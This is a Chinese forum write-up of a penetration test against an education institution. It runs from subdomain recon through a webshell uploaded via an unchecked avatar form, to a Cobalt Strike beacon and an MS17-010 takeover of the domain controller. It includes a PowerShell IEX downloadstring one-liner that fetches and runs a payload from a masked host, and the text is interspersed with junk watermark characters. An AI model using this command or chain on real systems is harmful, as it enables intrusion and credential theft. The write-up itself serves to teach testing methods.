|
G& ]2 z+ I+ b3 R
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
* Y/ A" `7 V J9 g
1 G6 v- z# C* E7 }
6 o* f- E$ h5 X# y / v9 T: y, C4 {0 D3 T
! M5 n7 }' ~6 v% v7 {1 F% x: b
+ y( x9 Y. P% Y: k a) i 正文
o6 E$ T7 c8 d- w) X$ X % A# J- I( G0 Q' M5 A
7 t. V3 S* j4 h1 u! D1 S L4 f
; @4 ?" W& Y: \" B& N" y
# q `. t! W; r* \ ^% v- q8 P l
& v8 u1 {! `$ s& ~4 |; ]5 L$ ?
目标:www.xxxx.com(一家教育机构) : j, }8 [: C T' ~6 P$ G' o8 i6 @
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- i# ]% X- Z+ D3 m; N ) Y3 `6 Q0 ?, @( @" {7 D
6 f9 L `% ~$ T
! g9 J9 L# n! z7 h; w# {0 v' s
0 H8 `3 ?1 }9 Y" R* E8 `
P+ z3 c5 \5 P) m& S& t 进行了简单的信息搜集
- ^2 ~ D, Q' h4 Z6 @ 3 ~% o \4 |; R
6 p' C* b6 g: V3 b ?: q. b
4 X" w# J) C e0 P5 H) `+ R3 w5 r3 k' H' x. y% a; n; i3 p
子域名搜集8 u* A( E& W1 E" h: I% B- p( c( U
- b. ^; P# g4 P$ l
2 h4 x; X4 O% b9 x3 x
, v3 x! u; t3 {! K4 K- O 8 \% s4 o0 c. _5 N8 |6 j- k
; _2 o! [7 H" ?3 \' B
fofa找资产 7 y2 n: m% E+ I
9 v8 s8 U* q* \5 e& U4 V8 C: `: s3 b' S6 E$ r( }
- \' k, k8 B, b J* Y+ ?# d; E l+ c
6 g/ ^7 f6 q# h) W
& C9 w# ?) B" O/ G& p) o2 U; L
4 k7 j0 u5 ?! y( W
. Q( r) d! v, L M5 H) ?1 m
一共七个资产。去重之后只有两个。
" g) K/ i! h9 ?& Z# q' b
+ S; L" r( f4 O! ~
5 Y. Q6 _/ D! S- c9 }5 } ' Z7 G; D5 y( R" R3 ~: c: {
3 N f& q, B2 v; U" Z/ @ 目录探测- q# b3 N0 p) b1 S
% w4 ~3 Q* Q) E2 _$ W9 e. ~9 V
7 ?+ s9 h$ V6 S4 ]
1 D. f R; P! j+ x; M 8 t9 z+ t" N7 w$ t( I2 ~6 _% m- I
3 w. s$ P- H# V+ n* \
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 2 T2 f7 k2 ?) @/ z5 g
( Y5 F) i7 `# U/ {9 ]6 O& c/ J; ^. K( f7 G" R; w8 {
& ^" B& Q$ k7 Q, w9 b+ E: K* a' |" O' W
我又尝试了通过修改返回包来绕过登录界面& @/ Y- K) D# Y
0 Q9 V9 p; B* k* u5 v( v! w% h* c( V# e7 N, Q. K; x3 N5 }
: L9 I8 |3 i' ^, g D4 B
& r6 x1 w, Z o3 J, T1 t3 G Q
, Z+ D( G0 ?2 [, M2 p 还是不行,尝试注入无果
5 b6 ~9 R+ R2 D1 b' `( X
2 H8 ]9 @+ g( m& ?7 o( J K+ [* ?
. ^. R6 \, g6 i. J+ [
/ l' k$ d K! G* A4 x3 t
0 d, P/ o. v" o7 O! y. J0 K% y. ^0 g0 l
不过我目录探测出了一处Spring信息泄露 " _( o/ Q( O2 Z( C/ i' \5 M
! z! y" K. \, W( O" }
% g, W) S9 s) ? % z4 ~) ], `, ^4 E1 F7 h1 ?% \
5 s$ v. m* k2 p( ]
`$ t9 j! Z6 E. R* O
: H! E6 |2 L9 S* k2 Y" H& G6 |
4 F! J" q, z2 M5 I* `. ~ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录; @' G& n* F b& Q# N; |- S
8 Q6 _+ a: p( o6 N5 i) M, _: I
" S6 q9 ^5 V! G6 N K# k
# A: g6 R7 u2 g5 u6 b- B
% K: L/ K. L% K$ m9 G2 N; w7 j/ O0 ~5 h# z7 I7 C5 c
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
" m! a: d, \1 i; ~+ \# G' B) @ 4 e% \7 x& N( ? |+ z! e: w/ H
2 {: d8 U' ~ A; [6 _- C
' D9 ~6 V1 S* ?, { 5 {: ^/ c& m; A: C( F$ N$ ]
7 f$ k* _9 ?* N j6 O, }; s
获取有些师傅到这一步就手机抓包电脑测了。9 B) n$ m7 @5 X/ V
" T, g2 p$ W0 i1 E4 V- P7 E; N
; B' S& B1 l' s( W9 r2 Y& T Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。3 e0 ~$ @3 t; [. Q: a5 M
" V5 |9 z1 @3 E9 F' T
' U& G6 Q0 m1 T7 Y& N5 m2 B 其中在一个公众号发现了小程序,可以进行注册。
' N: B' Y1 |- g% n; K
6 ]& h! K) r' W/ R/ j, l) T) a% V% ?) p4 l }! I
看到了头像上传,尝试上传获取WebShell
# |' p, Z8 F% c; _ Z0 L8 Z0 w7 |1 B0 D/ O
$ _; i+ M; P. A/ _# D
( {: i5 d7 `' V7 ]- s
x8 }: I [. g! ^
) Q- d5 V5 e8 X& a% S; x4 }2 Q
$ _; y Y, k+ C, S u/ X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 X1 n& x9 M& W" e8 y- I
5 _/ E% M2 K7 }3 \
9 @" _; E4 h; G5 r- v
% q- G7 Y6 a# v4 I3 K( k
3 q0 q, k h; _
7 l3 X* H1 u% M R 然后上了大马
6 N E3 \+ G# D: L7 c
3 v) ?. E! F& U& C) W
, G0 Q' _% z7 L, J- k9 M) z
+ ]' L" V2 {' c9 J
& Q0 F) d6 h4 l0 F, M$ u* T4 l6 b6 @% e$ y3 u5 A
/ g* r% Y: A9 K; h' X, e) \; p: Y 0 t+ z g+ @3 x9 j
8 [1 v h5 V: A5 R5 A 通过翻找文件发现数据库账号密码
% s1 B. Y1 l7 N! ~: J
* k, x+ o) \5 R. d$ y% v
0 Z7 P9 i. y" L: k+ s3 { # g- n1 ?+ s# y. a$ |9 K
8 ?3 C) z6 v: Y2 q# J; t
4 W( u( m4 n# I8 g --内网渗透
, t6 O: C7 v6 W! X( s4 x
. n3 R" Z$ U) i0 _1 T; d$ n$ z5 S. Q6 _1 g0 @
直接通过powershell执行 cs上线/ n- ^4 Y# W! C
& `5 y- T9 \, C+ x" t0 H* g5 v) N3 b9 L% ]& x, u- e# d
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 o" w$ L4 C% y
$ B" d! u$ |9 O2 ~! j7 L0 l! h( A$ _
; N% X: L6 B( C & M3 f' N/ D3 u# H
$ u5 h, X7 [/ L" a! n
0 i" A4 a3 M: a" R7 l$ l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破. w) R& ?$ P+ N6 ^( G: u
! o7 e/ G* p2 Q/ e2 n
' S. A5 Z4 y" t1 k/ Z$ s3 p! W+ a ! `4 W5 l* \+ S; H+ t9 f
; m* G, W8 x1 J) N; y
4 X6 H& U1 M/ }/ L) m5 J$ O* F0 G& d 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 " O& |; Z7 K) R7 e2 k1 V, T
, B5 B7 @9 ]( Y2 k/ }) ~
- b. W# l; m# G8 T
o; y8 u% u0 n w# `- z6 \; R* X * S! `" C! o( h
8 t3 ~# D0 o6 d0 x # y7 q( }) }2 B8 d$ x# N8 H$ a
4 P; T: I {0 Q! p) K
- u5 S) R! g9 o& V
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 C( y# J3 i: h* Y7 L* W+ X: r , m0 U* n, c6 R+ ]+ j$ G) k1 {
! E0 d8 _6 h: `6 O! n
& I, u5 v: n k. W5 N
% T/ D" x& G; U, ?7 U* |5 Q7 S$ ]* y- [
8 m9 Z" A: A/ v; K+ b N 1 i- i1 U, E8 e& D
; H" i( X5 H, T7 C- H
9 e }! I0 D* [' O* n9 X: j
- O: \5 P* p8 Z) h
% l* ]; g& g' T& a& c R$ q- Z
; x& ?- H: y% @1 U; F( t. u3 c' P! B
: T& M& J2 J* Q# C# [0 D
$ O7 u/ n2 j& Z- J& @$ ~% h" p9 n; N" ]
小结' ^" D6 @0 i3 E
: V0 ~2 h- E( D; j2 N& b4 }7 t
+ J7 z8 V* W- V O" {
% h# P& N9 Q$ l: G8 U6 P - h4 k5 L2 [- @% H
q* I6 x+ z$ N4 }. v3 j2 q4 ~' c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
$ r q( T2 t& p
; a3 z2 t/ p1 `4 ]2 S5 w5 C c# [
% e w5 T, n8 o$ n& ? / S4 A2 H( e1 w6 f/ h
. r, S6 ?2 O& p8 m1 l7 f2 R
; u. V; K3 Q$ c: P# N9 }" M1 b -
0 w6 \) n& I0 V4 `2 N6 @
& G3 b# z9 u* V# r
/ o3 Q0 d8 B8 V) l* u: v% g2 y# S -
! n2 R N; i: ~7 I9 I+ E! `
c# X# e" v0 I% k" O/ L; {
# {. n ^9 G2 i. X1 e2 S( f4 e
7 S) M2 c7 H$ Q/ v, e. H( T. ? K' m9 U! ~8 q
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html6 ?5 @/ J6 `/ Y: w/ R
+ @1 n9 N+ W9 P& R
- e4 \, W. e% |, U6 n% b
/ H0 G, N" C" o% N9 Q |